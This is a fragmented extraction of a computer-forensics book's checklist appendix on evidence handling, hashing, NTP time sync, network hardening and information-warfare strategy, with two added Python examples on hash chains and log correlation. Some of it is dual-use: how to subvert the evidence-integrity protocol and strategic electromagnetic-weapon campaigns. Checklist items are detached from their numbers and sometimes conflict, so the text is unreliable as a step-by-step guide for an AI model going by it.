Have procedures in place to support outgoing services through firewall configuration
...
Have procedures in place to protect internal IP services
...
Have procedures in place to measure risk to avoid disaster
...
24
...
26
...
28
...
30
...
32
...
34
...
36
...
38
...
40
...
42
...
44
...
____ 46
...
____ 48
...
Have procedures in place to be able to manage and document the recovery
...
Have procedures in place to assure the plan and apply document management
...
Have procedures in place to implement PKI
...
Have procedures in place to design wireless network security
...
Have procedures in place to install and deploy wireless network security
...
Have procedures in place to be able to implement satellite encryption
...
Have procedures in place to conduct a privacy-needs audit
...
Have procedures in place to implement an enterprise privacy plan
...
Have procedures in place to manage privacy on the Internet supply chains
...
Have procedures in place to install and deploy ID management
...
Have procedures in place to plan for identity theft protection techniques
...
Have procedures in place to deploy enterprise biometrics solutions
...
Have procedures in place to launch a national cybersecurity awareness and training program
...
1 Vendor and Forensics Services Types Checklist Form
Vendor and Forensic Services Types Checklist Form
Date: ____________________
The CFS should ensure that the following provisional list of actions for some of the vendor and forensic services types are adhered to (check all tasks completed):
____ 1
...
____ 3
...
____ 5
...
____ 7
...
____ 9
...
____ 11
...
____ 13
...
Make sure your computer forensics service provides an analysis of computers and data in criminal investigations
...
Make sure your computer forensics service provides an analysis of computers and data in civil litigation
...
Make sure your computer forensics service provides an analysis of the company computers to determine employee activity
...
Make sure your computer forensics service provides reporting in a comprehensive and readily understandable manner
...
Make sure your computer forensics service conducts computer forensics on both PC and MAC platforms
...
Have procedures in place to employ the latest tools and techniques to recover your data
...
Have procedures in place to allow you to recover even the smallest remaining fragments
...
____ 15
...
____ 17
...
____ 19
...
Have procedures in place to survey your business and provide guidance for improving the security of your information
...
Be cognizant of the IP address limitations for determining the possible attribution of the event you are investigating
...
Have procedures in place to investigate the possibility of staffing a professional competitive intelligence cell in your company or sponsoring an assessment of the threat to your company’s systems from a group of intelligence and information security specialists
...
PART II: COMPUTER FORENSICS EVIDENCE AND CAPTURE
Chapter 5: Data Recovery
Table F5
...
____ 2
...
Make sure you are ready and have procedures in place for disasters like floods, tornadoes, earthquakes, and terrorism when they strike
...
Perform change accumulation to reduce the number of logs required as input to the recovery, which saves time at the recovery site
...
____ 4
...
____ 6
...
____ 8
...
____ 10
...
Evaluate your environment to decide how to handle the change accumulation question/problem in action/task #3
...
Check your assets to make sure they’re ready as part of your plan
...
JCL is tricky, and you need to get it exactly right
...
Clean your RECON data sets
...
When your system is down, can you afford to make mistakes with this key resource?
Test your plan
...
In the real world, there’s much more
...
Have procedures in place to deal with issues of increased availability, shrinking expertise, growing complexity, failures of many types, and the costs of data management and downtime
...
1 Evidence Collection and Data Seizure Checklist Form
Evidence Collection and Data Seizure Checklist Form
Date: ____________________
The CFS should ensure that the following provisional list of actions for evidence collection and data seizure are adhered to (check all tasks completed):
____ 1
...
____ 3
...
Make sure that once you’ve created a master copy of the original data, you don’t touch it or the original itself—always handle secondary copies
...
Make sure you understand what you are doing, because you have to be able to account for any changes you made and describe exactly what you did
...
Make sure your plan of action is not based on trial and error
...
____ 5
...
____ 7
...
____ 9
...
____ 11
...
Always try to collect the most volatile evidence first, because some electronic evidence is more volatile than others
...
Never, ever shut down a system before you collect the evidence
...
It is even worse than shutting a system down and should be avoided
...
Any programs you use should be on read-only media (such as a CD-ROM or a write-protected floppy disk) and should be statically linked
...
Make sure your planning stage takes place prior to any investigator arriving at the computer crime scene, including two ways to structure a team of investigators
...
It can go a long way in easing the burden of carrying out a search and seizure
...
1 Duplication and Preservation of Digital Evidence Checklist Form
Duplication and Preservation of Digital Evidence Checklist Form
Date: _________________
The computer forensics specialist should ensure the following are adhered to (check all tasks completed):
____ 1
...
____ 3
...
____ 5
...
____ 7
...
Shut down the computer
...
Transport the computer system to a secure location
...
Mathematically authenticate data on all storage devices
...
Make a list of key search words
...
____ 9
...
____ 11
...
____ 13
...
____ 15
...
____ 17
...
Evaluate unallocated space (erased files)
...
Document file names, dates, and times
...
Evaluate program functionality
...
Retain copies of software used
...
Chapter 8: Computer Image Verification and Authentication
Table F8
...
____ 2
...
To successfully subvert the digital integrity
verification and authentication protocol, it would be necessary to do the following without detection: either in a manner that ensures that the relevant
data block produces the same hash value or that the relevant hash value is
recalculated and inserted into the vault, (1) recalculate all the subsequent
derivative hash values; (2) recalculate and rewrite the relevant encrypted
block; break the seals on the relevant digital integrity verification and authentication floppy disks; and rewrite the data and repair the seals
...
This would require the original DIBS drive; the original
password known only to the copying officer (and encrypted on each cartridge in the series); exact knowledge of the date and time settings within the
computer at the time of the original copy; and either a similarly numbered
tamperproof bag on which the defendant’s signature would be forged, or the
original bag opened and resealed with the new floppy inside
...
____ 4
...
____ 6
...
The digital integrity of the floppy disk
and the physical integrity of the tamperproof bag are, in this case, the arbiters of whether such discrepancies were deliberately manufactured
...
It is, thus, useless for a defendant to destroy his or her floppy disk in the hope that its absence will assist any
challenge to the digital integrity verification and authentication protocol
...
Take steps to make sure security is a higher priority for your company
...
1 Discovery of Electronic Evidence Checklist Form
Discovery of Electronic Evidence Checklist Form
Date: _________________
The computer forensics specialist should ensure the following are adhered to
(check all tasks completed):
____ 1
...
____ 3
...
____ 5
...
Do not alter discovered information
...
Document all investigative activities
...
Prepare the electronic means needed to document the search
...
____ 7
...
____ 9
...
____ 11
...
____ 13
...
____ 15
...
Back up the information discovery file or files
...
Mathematically authenticate the information discovery file or files
...
Find the MD5 message digest for the original information discovery file or files
...
When forensic work is complete, regenerate the message digest values using
the backups on which work was performed; log these new values alongside
the hashes that were originally generated
...
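The two hashing steps above (the derivative hash chain whose later values all change when one block is altered, described in the Chapter 8 checklist, and the before/after message-digest record in this checklist) as an added example; this is illustrative code, not the book's or the DIBS product's own, and the block size, the "vault" layout and the sample evidence bytes are constructed here.

```python
"""Added example, not the book's or the DIBS product's own code: a derivative
hash chain in the spirit of the Chapter 8 verification protocol, plus the
before/after message-digest record from the discovery checklist.  Block size,
the "vault" layout and the sample evidence bytes are constructed here."""
import hashlib
from typing import Dict, List, Optional

BLOCK_SIZE = 64  # constructed; imaging tools use far larger blocks


def digest(data: bytes, algorithm: str = "md5") -> str:
    """Hex message digest. The checklist names MD5; pass "sha256" for a
    collision-resistant algorithm."""
    return hashlib.new(algorithm, data).hexdigest()


def split_blocks(data: bytes, size: int = BLOCK_SIZE) -> List[bytes]:
    return [data[i:i + size] for i in range(0, len(data), size)]


def build_chain(data: bytes, algorithm: str = "md5") -> List[str]:
    """Derivative hash chain: hash i covers block i *and* hash i-1, so altering
    one block silently changes every hash that follows it."""
    chain: List[str] = []
    prev = b""
    for block in split_blocks(data):
        h = digest(prev + block, algorithm)
        chain.append(h)
        prev = h.encode("ascii")
    return chain


def first_mismatch(data: bytes, vault: List[str],
                   algorithm: str = "md5") -> Optional[int]:
    """Index of the first block whose derivative hash differs from the stored
    chain (the "vault"), or None when the data verifies."""
    chain = build_chain(data, algorithm)
    for i, (got, expected) in enumerate(zip(chain, vault)):
        if got != expected:
            return i
    if len(chain) != len(vault):          # data truncated or extended
        return min(len(chain), len(vault))
    return None


def changed_hashes(data: bytes, vault: List[str],
                   algorithm: str = "md5") -> int:
    """How many vault entries an undetected edit would have to recompute."""
    chain = build_chain(data, algorithm)
    differing = sum(1 for got, exp in zip(chain, vault) if got != exp)
    return differing + abs(len(chain) - len(vault))


def open_record(original: bytes, working_copy: bytes,
                algorithm: str = "md5") -> Dict[str, object]:
    """Before analysis: digest the original and the working copy, log both."""
    return {
        "algorithm": algorithm,
        "original": digest(original, algorithm),
        "working_copy_before": digest(working_copy, algorithm),
    }


def close_record(record: Dict[str, object],
                 working_copy_after: bytes) -> Dict[str, object]:
    """After forensic work: regenerate the working copy's digest and log it
    alongside the values recorded at the start."""
    algorithm = str(record["algorithm"])
    after = digest(working_copy_after, algorithm)
    closed = dict(record)
    closed["working_copy_after"] = after
    closed["working_copy_changed"] = after != record["working_copy_before"]
    closed["copy_matches_original"] = after == record["original"]
    return closed


# Constructed sample evidence: 200 bytes, i.e. four blocks of 64, 64, 64, 8.
EVIDENCE = (b"constructed sample disk image " * 8)[:200]
VAULT = build_chain(EVIDENCE)
# One flipped bit at offset 70 lands in block 1.
TAMPERED = EVIDENCE[:70] + bytes([EVIDENCE[70] ^ 0x01]) + EVIDENCE[71:]

if __name__ == "__main__":
    print("original verifies:", first_mismatch(EVIDENCE, VAULT) is None)
    print("first bad block:", first_mismatch(TAMPERED, VAULT))
    print("hashes to recompute:", changed_hashes(TAMPERED, VAULT), "of", len(VAULT))
    rec = close_record(open_record(EVIDENCE, EVIDENCE), TAMPERED)
    print("working copy changed during work:", rec["working_copy_changed"])
```

A single-byte change in block 1 leaves block 0's hash intact but invalidates the remaining three chain entries, which is why the text says an undetected edit must recompute every subsequent derivative value.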
Briefly compare the physical search and seizure with its logical (data-oriented)
counterpart, information discovery
...
1 Identification of Data Checklist Form
Identification of Data Checklist Form
Date: _________________
The computer forensics specialist should ensure the following are adhered to
(check all tasks completed):
____ 1
...
____ 3
...
Use NTP for security reasons
...
WWV broadcasts time signals over short wave, so this information is
available worldwide
...
GPS relies on accurate timekeeping for calculating position
and movement
...
Remember to have multiple sources
...
(You should disable this service if you’re not using it
...
Keeping all your systems synchronized to accurate time is not a luxury
...
If you find yourself
comparing logs from disparate systems, you’ll be exceedingly grateful that
you decided to implement NTP
...
1 Reconstructing Past Events Checklist Form
Reconstructing Past Events Checklist Form
Date: _________________
The computer forensics specialist should ensure the following are adhered to
(check all tasks completed):
____ 1
...
____ 3
...
____ 5
...
____ 7
...
This can be particularly difficult when it comes to computers—clock
drift, delayed reporting, and differing time zones can create confusion in
abundance
...
Record any clock drift and the time zone in use, as you will need this later,
but changing the clock just adds in an extra level of complexity that is best
avoided
...
Log files usually use timestamps to indicate when
an entry was added, and these must be synchronized to make sense
...
You’re not just reconstructing events; you are making a
chain of events that must be accounted for as well
...
Using a common reference point can make things much easier
...
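The clock-drift, time-zone and common-reference-point advice above as an added example that is not part of the book: each host's recorded zone and drift is applied during analysis (the machines' clocks are left alone), so entries from different systems sort into one chain of events. The host names, offsets, drifts and log lines are constructed for illustration.

```python
"""Added example, not from the book: bring log timestamps from several seized
systems onto one UTC reference so their entries can be correlated.  The host
names, time zones, measured drifts and log lines below are all constructed."""
import re
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Tuple

# Recorded at the scene (per the checklist) rather than "fixed" on the machine:
# the zone each clock was set to and how far it ran ahead (+) or behind (-)
# the reference clock, in seconds.
HOSTS: Dict[str, Dict[str, int]] = {
    "fw01":  {"utc_offset_hours": 0,  "drift_seconds": 0},    # NTP-synced reference
    "web01": {"utc_offset_hours": -5, "drift_seconds": 125},  # 2 min 5 s fast, UTC-5
    "db01":  {"utc_offset_hours": 1,  "drift_seconds": -40},  # 40 s slow, UTC+1
}

# Constructed sample lines: "<local timestamp> <host> <message>".
SAMPLE_LOG = """\
2004-03-12 14:02:40 web01 accepted login for operator from 10.0.0.9
2004-03-12 19:00:20 fw01 allowed tcp 10.0.0.9 -> 172.16.0.5:22
2004-03-12 20:00:50 db01 new session from 172.16.0.5
"""

LINE_RE = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (\S+) (.*)$")
Event = Tuple[datetime, str, str, str]  # (reference time, host, local stamp, message)


def to_reference_time(local_stamp: str, host: str) -> datetime:
    """Local wall-clock string -> drift-corrected UTC datetime."""
    meta = HOSTS[host]
    naive = datetime.strptime(local_stamp, "%Y-%m-%d %H:%M:%S")
    zone = timezone(timedelta(hours=meta["utc_offset_hours"]))
    local = naive.replace(tzinfo=zone)
    # A fast clock shows a later time than the truth, so subtract its drift.
    return (local - timedelta(seconds=meta["drift_seconds"])).astimezone(timezone.utc)


def parse_events(log_text: str) -> List[Event]:
    events: List[Event] = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed line: skipped here, would be logged in practice
        stamp, host, msg = m.groups()
        if host not in HOSTS:
            raise KeyError(f"no clock record for host {host!r}")
        events.append((to_reference_time(stamp, host), host, stamp, msg))
    return events


def naive_order(log_text: str) -> List[str]:
    """Hosts ordered by the raw local stamps, as an unwary reader would do."""
    return [e[1] for e in sorted(parse_events(log_text), key=lambda e: e[2])]


def correlated_order(log_text: str) -> List[str]:
    """Hosts ordered by the common UTC reference time."""
    return [e[1] for e in sorted(parse_events(log_text), key=lambda e: e[0])]


if __name__ == "__main__":
    for ref, host, stamp, msg in sorted(parse_events(SAMPLE_LOG)):
        print(f"{ref:%Y-%m-%d %H:%M:%S}Z  {host:5}  (local {stamp})  {msg}")
    print("raw order:      ", naive_order(SAMPLE_LOG))
    print("corrected order:", correlated_order(SAMPLE_LOG))
```

Read raw, the web server's accepted login appears before the firewall allowed the connection, which is impossible; once drift and zone are applied, the firewall entry comes first and the chain of events makes sense.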
This examination host should be secure, clean (a fresh, hardened install of
the operating system is a good idea), and isolated from any network—you
don’t want it tampered with while you work, and you don’t want to accidentally send something nasty down the line
...
____ 9
...
____ 11
...
____ 13
...
Commence analysis of the backups once the system is available
...
Document everything you do
...
Ensure that what you do is not only repeatable, but that you always get the
same results
...
Make sure you correlate all the evidence you have gathered (which is why accurate timestamps are critical)
...
Include all of the evidence you’ve found when reconstructing the attack—no
matter how small it is, you may miss something if you leave a piece of evidence out
...
Chapter 12: Networks
Table F12
...
____ 2
...
____ 4
...
Apply standard research and analysis techniques to datasets provided by a
company or organization
...
Provide initial datasets, project initiation, and training in network traffic
datasets and analysis techniques
...
____ 6
...
8
...
10
...
12
...
14
...
16
...
____ 18
...
____ 20
...
____ 22
...
____ 24
...
Repeatedly test and verify new visualization techniques and procedures to
ensure that new patterns are, in fact, accurate representations of designated
activities
...
Develop a design methodology for visualizing test data
...
Map data structures to a visualization model
...
Refine a prototype
...
Test live Internet data
...
Produce new visualization techniques to streamline and enhance analysis of
network forensic data
...
The resulting interactive visualization interface will advance the usability of the system, solve
the volumetric problem with analyzing these datasets, and advance the adaptation of the solution in the INFOSEC market
...
Clear the archives after an additional specified time
...
Automatically erase email from the computer system, including backups,
after a short period (15–30 days)
...
Formulate and distribute a statement that the automatic deletion of electronic records will be suspended and steps taken to preserve records in the
event of investigation or litigation
...
All agencies that seize and/or examine digital evidence must do this
...
____ 26
...
____ 28
...
____ 30
...
____ 32
...
____ 34
...
____ 36
...
____ 38
...
Clearly set forth in this SOP document all elements of an agency’s policies
and procedures concerning digital evidence, which must be issued under the
agency’s management authority
...
Make sure the procedures you use are generally accepted in the field or supported by data gathered and recorded in a scientific manner
...
Use hardware and software that is appropriate and effective for the seizure or
examination procedure
...
Make sure all digital evidence is available for review and testimony
...
Be alert
...
Security experts agree that ignorance is the
most detrimental security problem
...
Web sites such as the CERT home page
(http://www
...
org) are excellent places to get current information
...
Many companies will sit on patches rather than
put them to use
...
Smart hackers bank on the negligence of others
...
Although just about any application that uses TCP requires a port, you can minimize exposure by limiting the number of ports
accessible through a firewall
...
Eliminate unused user IDs and change existing passwords
...
Make sure system administrators routinely audit and delete any idle user IDs
...
Avoid the use of simple network management protocol (SNMP) across the
firewall
...
____ 41
...
____ 43
...
____ 45
...
Secure remote access
...
You can learn a
lot by hacking into your own system
...
If you can gain access to your systems
from a workstation outside your network, you can easily test your packet-filtering scheme without any outside exposure
...
Ask a consultant when in doubt
...
Many companies offer security assessment and training services
...
Be sure to eliminate unused user IDs and to avoid provisioning SNMP services through the firewall
...
1 Defensive Strategies for Governments
and Industry Groups Checklist Form
Defensive Strategies for Governments and Industry Groups Checklist Form
Date: _________________
The CFS should ensure that the following provisional list of actions for
preparing for defensive strategies for governments and industry groups are
adhered to (check all tasks completed):
____ 1
...
Who should be in charge in the government? An
immediate and badly needed first step is the assignment of a focal point for
federal government leadership in support of a coordinated U.S. response to
the strategic IW threat
...
____ 3
...
____ 5
...
____ 7
...
coordination of the large number of government organizations involved in
such matters—and the necessary interactions with the Congress—be effectively carried out
...
The Executive Office
should also have the responsibility for close coordination with industry, because the nation’s information infrastructure is being developed almost exclusively by the commercial sector
...
Conduct an immediate risk assessment
...
List the components of this review
...
In an environment of dynamic change in both cyberspace
threats and vulnerabilities, there is no sound basis for presidential decision
making on strategic IW matters without such a risk assessment
...
In this context, there is
always the hope or the belief that the kind of aggressive response can be delayed while cyberspace gets a chance to evolve robust defenses on its own
...
But it may not, and we’re certainly not there now
...
The appropriate role for government in responding to the strategic IW threat needs to be addressed, recognizing that
this role (certain to be part leadership and part partnership with the domestic sector) will unquestionably evolve
...
In addition to being the performer of certain basic preparedness functions (such as
organizing, equipping, training, and sustaining military forces), the government may play a more productive and efficient role as facilitator and maintainer of some information systems and infrastructure; through policy
mechanisms such as tax breaks to encourage reducing vulnerability and improving recovery and reconstitution capability
...
An important factor is the traditional change in the government’s role as one moves from national defense through public safety toward things that represent the public
____ 9
...
____ 11
...
____ 13
...
____ 15
...
Clearly, the government’s perceived role in this area will have to be balanced against public perceptions of the loss of civil liberties and the commercial sector’s concern about unwarranted limits on its practices and markets
...
Once an initial risk assessment has
been completed, U.S. national security strategy needs to address preparedness for the threat as identified
...
Create a minimum essential information infrastructure (MEII) as a possible
strategic defensive IW initiative
...
Maintain the strategic nuclear Minimum Essential Emergency Communications Network (MEECN)
...
At an early date conduct an assessment of the feasibility of an MEII
...
Establish a national military strategy
...
Because of the emerging theaters
of operation in cyberspace for such contingencies, strategic IW profoundly
reduces the significance of distance with respect to the deployment and use
of weapons
...
Create a plan for a national military strategy
...
Consideration of
these IW features should be accounted for in U.S. national military strategy
...
Against this difficult projection and assessment situation, there is the ever-present risk that the United States could find itself in a crisis in the near
term, facing the possibility of, or indications of, a strategic IW attack
...
by whom) and whether the U.S.
military plan and strategy is vulnerable, a
foot-shuffling “we don’t know” will not be an acceptable answer
...
It must be acknowledged that strategic IW
is a very new concept that is presenting a wholly new set of problems
...
Chapter 14: The Information Warfare Arsenal and Tactics of the Military
Table F14
...
____ 2
...
____ 4
...
Review of the military organization’s mission
...
A few military organizations may find that IW-D adds a mission
or increases the importance of an existing mission
...
New relationships with external organizations
may be required, or perhaps existing relationships may need to be modified
...
Allocate responsibilities
...
Perhaps the responsibility for IW-D is spread out among several individuals
...
Identify which information and systems are critical
...
It is important, given resource constraints, to identify which information and systems (and functions of these systems) are critical and which
are not critical
...
How vulnerable are the information and
systems? What is the specific nature of the vulnerabilities? Answers are
____ 6
...
____ 8
...
____ 10
...
It needs to
be remembered that vulnerabilities are relative to the threat, the nature of
which is constantly evolving
...
Develop a comprehensive IW-D strategy
...
Develop a plan to manage risks
...
Discuss the issues
...
These discussions will create a greater awareness of the
problem within the military organization and improve the organization’s
ability to meet the challenges associated with IW-D
...
Combating IW is
a long-term proposition
...
A military
organization’s investment strategies need to be reviewed, and investments in
defenses and supporting technologies must be made
...
Some reallocation of resources may be made necessary
by changes in the operating costs associated with introducing new procedures and safeguards
...
1 Information Warfare Arsenal and
Tactics of Terrorists and Rogues Checklist Form
Information Warfare Arsenal and Tactics
of Terrorists and Rogues Checklist Form
Date: _________________
The CFS should ensure that the following provisional list of actions for
preparing for information warfare arsenal and tactics of terrorists and rogues
are adhered to (check all tasks completed):
____ 1
...
____ 3
...
____ 5
...
____ 7
...
____ 9
...
____ 11
...
____ 13
...
Nations developing information strategies should consider investment, both
intellectually and financially, across the gamut of information operations
...
In an era when terrorism may take place across the
globe and sponsors may cross national and regional lines, the global sight and
reach of Air Force assets should be valuable to national decision makers
...
They can, however, play an important role in
intelligence and covert action
...
The same instruments may be used in parallel against terrorist supporters, terrorist infrastructure and networks, and terrorists themselves
...
Deterrence and response should probably evolve in the direction of a more
“personalized” approach emphasizing the monitoring and attack of key
nodes in terrorist networks and the forcible apprehension of individual terrorist suspects
...
Air and space power should help make terrorism—an increasingly amorphous phenomenon—more transparent
...
As terrorism becomes more diffuse and its sponsorship increasingly hazy,
finding the “smoking gun” should become more difficult but essential to
building a consensus for action
...
Counterterrorism should increasingly focus on urban areas and thus face
strong operational constraints
...
The use of air power for counterterror, therefore, faces the more
____ 14
...
The value of air power here should depend on its capacity for discriminate
targeting and less-than-lethal technologies
...
1 Information Warfare Arsenal and Tactics of
Private Companies Checklist Form
Information Warfare Arsenal and Tactics of
Private Companies Checklist Form
Date: _________________
The CFS should ensure that the following provisional list of actions for
preparing for information warfare arsenal and tactics of private companies
are adhered to (check all tasks completed):
____ 1
...
____ 3
...
It is recommended that, traditionally, private companies be organized in a
hierarchical way and also be viewed as such
...
Once within the structure, movement up to the
pinnacle of command is meant to be within certain set parameters, and deviation from these parameters is not encouraged
...
Flat management
does not allow for free ingress from the outside as one of its goals—it may
allow for more points of contact between points inside the structure and
outside, but these are monitored and controlled
...
All of these concentric defenses should repeat the pattern of controlled
and protected points of ingress and egress
...
____ 5
...
____ 7
...
____ 9
...
Corporate entities should have new points of ingress (such as telephony and
Internet access points)—consumers demand it
...
Attention should also be paid to points of egress
...
A hierarchical corporation, based on a fortress structure, may be vulnerable
if an information flow is disrupted
...
The entity may be hard put to
regroup and function without great delay
...
Diversified information and command lines
should be called into action and utilized should one line be cut
...
This does not mean to say that a
corporation should abandon all controls of ingress and egress, and open its
doors to the world
...
This
discussion highlights the first primary step in risk management—identification
...
A simple treatment
of defensive structures may not be wise, because the chaotic nature of the information network and the development of new technologies will inevitably
mean that new forms of attacks and new holes in the armor will always open,
often in unexpected places
...
Chapter 17: The Information Warfare Arsenal of the Future
Table F17
...
____ 2
...
____ 4
...
____ 6
...
Going a stage further and attacking the NII can certainly be an attractive option for substate groups
...
More technology-savvy groups
such as environmental protesters may be the first to use offensive IW techniques but they will have limited aims and not pose a national security
threat
...
Institute a review of national vulnerabilities to an IW arsenal of the future
...
In the past, states have tended to react to changing terrorist
threats rather than preempting them, and the substate group usually retains
the initiative
...
As yet, though,
there has not been national leadership of the sort provided by the White
House and the Congress
...
Performing a holistic assessment of national
vulnerabilities and creating a rigorously enforced information assurance program can meet this new threat
...
For once, the British government, in conjunction with its European
partners, has the opportunity of staying ahead of an emerging threat from
terrorist and other substate groups
...
Conduct strategic IW campaigns
...
Clearly, such
weapons are potent force multipliers in conducting a conventional war, particularly when applied to electronic combat, offensive counterair (OCA),
and strategic air attack operations
...
The massed use of such IW
weapons would provide a decisive advantage to any nation with the capability to effectively target and deliver them
...
Commit to strategic IW campaigns
...
____ 8
...
____ 10
...
____ 12
...
Western governments
have been traditionally reluctant to commit to strategic campaigns, as the
expectation of a lengthy and costly battle, with mass media coverage of its
highly visible results, will quickly produce domestic political pressure to
cease the conflict
...
In this strategy, an opponent who
threatens escalation to a full-scale war is preemptively attacked with electromagnetic weapons to gain command of the electromagnetic spectrum and
command of the air
...
Should
these fail to produce results, more targets may be disabled by electromagnetic attack
...
Air and sea blockades are
complementary means via which pressure may be applied
...
Because electromagnetic
weapons can cause damage on a large scale very quickly, the rate at which
damage can be inflicted can be very rapid, in which respect such a campaign
will differ from the conventional, where the rate at which damage is inflicted
is limited by the usable sortie rate of strategic air attack capable assets
...
Should
blockade and the total disabling of vital economic assets fail to yield results,
these may then be systematically reduced by conventional weapons, to further escalate the pressure
...
Use the strategy of graduated response
...
Again, the strategy of graduated response, using electromagnetic
bombs in the initial phases, would place the government under significant
pressure to concede
...
Do not use advanced nanotechnology to build small self-replicating machines that can feed on organic matter—a bit like bacteria but much more
versatile, and potentially more destructive than the H-bomb
...
1 Surveillance Tools for Information Warfare
of the Future Checklist Form
Surveillance Tools for Information
Warfare of the Future Checklist Form
Date: _________________
The computer forensics specialist should ensure the following actions are adhered to (check all tasks completed):
____ 1
...
____ 3
...
____ 5
...
____ 7
...
____ 9
...
____ 11
...
As a punitive weapon, electromagnetic devices
are attractive for dealing with belligerent governments
...
Use cookies wisely and visitors will appreciate their value
...
It’s up to you to help keep cookies from being the most unpalatable junk food on the Web
...
There really is no solution to being able to track Word documents using Web bugs
...
Do not disable Web browser cookies inside of Word documents
...
zonelabs
...
jsp) to warn about Web bugs in Word documents
...
ZoneAlarm is designed to catch trojan horses and spyware
...
The data to be mined should have a direct connection to the goal task, and
the new information should be directly applicable to the task situation
...
Think first about what kind of information is
needed and how it will be used
...
Consider alternative data sources
...
Alter the objectives if no additional data can be obtained and the existing
data is inadequate for the original task specification
...
1 Civilian Casualties: The Victims and Refugees of
Information Warfare Checklist Form
Civilian Casualties: The Victims and Refugees
of Information Warfare Checklist Form
Date: _________________
The computer forensics specialist should ensure the following actions are adhered to (check all tasks completed):
____ 1
...
____ 3
...
____ 5
...
____ 7
...
____ 9
...
Make sure that general or centralized monitoring of communications are
not a chief or central component of the government’s response to computer
security
...
Reject the authority for increased monitoring of information systems
...
Limit the role of the FBI and the NSA in computer security: it has been
demonstrated that their surveillance agendas trump their protective missions, and their activities are often so cloaked in secrecy as to generate understandable suspicion
...
There should be established within the executive branch appropriate mechanisms for oversight of computer security issues, involving both industry
representatives and privacy advocates
...
Limit the government’s role in private sector infrastructure protection, even
though the cyber masses acknowledge the need for government participation, especially in educating society about what is at stake
...
PART V: ADVANCED COMPUTER FORENSICS SYSTEMS
AND FUTURE DIRECTIONS
Chapter 20: Advanced Computer Forensics
Table F20
...
____ 2
...
____ 4
...
____ 6
...
____ 8
...
____ 10
...
____ 12
...
____ 14
...
____ 16
...
____ 18
...
Install patches
...
If a networked computer is shared, make sure it receives the same security
updates as other systems
...
Perform frequent security audits, including trying to gain access using easily available hacking tools
...
Make sure your gateway to the Internet is a system without any important
company data or a hardware solution backed up by a firewall
...
Regularly test the security yourself; then you know what to find solutions for
...
Require every person logging-on to use a password
...
Back up all systems weekly
...
Always have a current copy of the backup tape stored remotely
...
Rotate backup tapes—don’t use the same one over and over again
...
Keep servers in a secured area
...
____ 21
...
____ 23
...
____ 25
...
____ 27
...
____ 29
...
____ 31
...
____ 33
...
____ 35
...
____ 37
...
____ 39
...
Use intrusion detection software that alerts you when you are being hit
...
Have an information security department (at least one person and then one
other for every 1,000 users) that is separate from the IT department and reports directly to the chief information officer
...
Train information security personnel to be aware of any employee who
shows signs of being troubled or disgruntled, particularly if that employee
holds an information-critical position
...
Monitor the network—set up software that will alert you if someone is
working in a different part of the network or at a different time than usual
...
Make sure the person in charge of the system is not the same person in
charge of the backup
...
Make sure critical IT workers are bonded
...
Verify that your backup tapes are where they should be; make sure the information has been saved correctly and the tape is functioning properly
...
Lock down every system that a terminated employee had access to on the
day of termination
...
Go up on the system and check user names and passwords, looking for anything unusual
...
Lock down all the inside doors, such as the file servers, application servers,
and mail servers
...
____ 41
...
____ 43
...
Make sure there aren’t any known vulnerabilities that haven’t been
patched—the administrator could have left those holes behind so he could
get back in
...
Set a trip wire—software that alerts the administrator to system anomalies,
such as the size of a file changing
...
#10-143, Incline Village, NV 89451, 2004 [The
Computer Forensics Expert Witness Network, 472 Scenic Drive, Ashland,
OR 97520, 2004]
...
All rights reserved),
2001
...
Figures: All of the figures from the book, in folders by chapter
...
SYSTEM REQUIREMENTS
Please visit the developer Web sites listed in this appendix for exact system requirements, FAQs, updates, ordering information, licenses, and links to other
tools and sources
...
0 or higher, Windows 2000, XP, and
2003 and WinZip, as well as an Internet connection; some also require basic hardware such as: Firewire, USB devices, Zip, Jaz, floppy diskettes, or hard disk drives
(IDE, EIDE, SCSI, ATA, SATA)
...
The information contained on the CD-ROM is the property of the respective
developers
...
Inquiries regarding
the software contained on the CD-ROM should be directed to the developers of the
products
...
The developers in this appendix and CD-ROM are listed in alphabetical
order, followed by a list of software products and documentation
...
Also, a number of the companies’ contributions include large numbers of support files which are not meant to be opened directly by the user (for example, LC
Technology, ManTech Security & Mission Assurance and New Technologies,
Inc
...
The filename and/or the entire folder (if all the
files can be opened by the user) have been added after the product name, and all
other files in that folder are support files and not meant to be opened by the user
...
txt) that accompany each developer file
and folder
...
Just read and follow the instructions carefully before accessing
any
...
ACR Data Recovery, Inc
...
atl-datarecovery
...
They also offer software for do-it-yourself recovery situations
...
1749 Dexter Avenue North, Seattle, Washington 98109
Products (documents/presentations):
Discovery of Databases in Litigation, Instant Messenger Programs, Ten
Steps to Successful Computer Discovery, Ten Ways to Torpedo Your Data
Discovery Expert
Phone: 206-324-6232
Fax: 206-322-7318
email: cfinc@forensics
...
forensics
...
offers services in electronic discovery, forensic analysis,
expert witness services, and risk control programs for companies
...
computerforensiclabsinc
...
CyberEvidence
5 Grogan’s Park, Suite 211, The Woodlands, TX 77380
Products (documents/presentations):
Articles, Online training manuals and presentations, Newsletters
Phone: 281-296-0465
http://www
...
com
CyberEvidence, Inc
...
The computer forensics training classes run all year and are available
for both the novice and the advanced investigator
...
CY4OR
Northern office:
CY4OR Limited, 116a Bury New Road, Whitefield, Manchester, M45 6AD
Phone: 0161-767-8123
Fax: 0161-766-2225
Southern Office:
CY4OR Limited, 7 Midshires Business Park, Smeaton Close, Aylesbury,
Bucks, HP19 8HL
Products (documents/presentations):
Are You Sitting Next to a Criminal?
Phone: 01296-488123
Fax: 01296-488124
http://www
...
co
...
Digital Mountain, Inc
...
com; http://www
...
com
Digital Mountain is a provider of computer forensics, electronic discovery, network forensics, and electronic management services on a national basis
...
e-fense, Inc
...
Saint Asaph St
...
e-fense
...
is a certified computer forensic professionals firm that offers computer forensics, network security, and electronic discovery
...
About the CD-ROM
eMag Solutions
3495 Piedmont Road, Eleven Piedmont Center, Suite 500,
Atlanta, GA 30305
Products (documents/presentations):
Data recovery, Electronic discovery, Exchange server data recovery, Facts
about tape, MMPC, MMTMS, Novell GroupWise data recovery, Optical
conversion recovery
Phone: 800-364-9838; 404-995-6060
Fax: 800-334-8273; 404-872-8247
http://www
...
com/
Based in the U
...
and U
...
, eMag provides computer forensic software and
services
...
53 W
...
forensicon
...
, provides top-notch assistance to law firms and corporations
nationwide in expert computer forensics and electronic discovery services
...
, Second Floor, Pasadena, CA 91101
Products (documents/presentations):
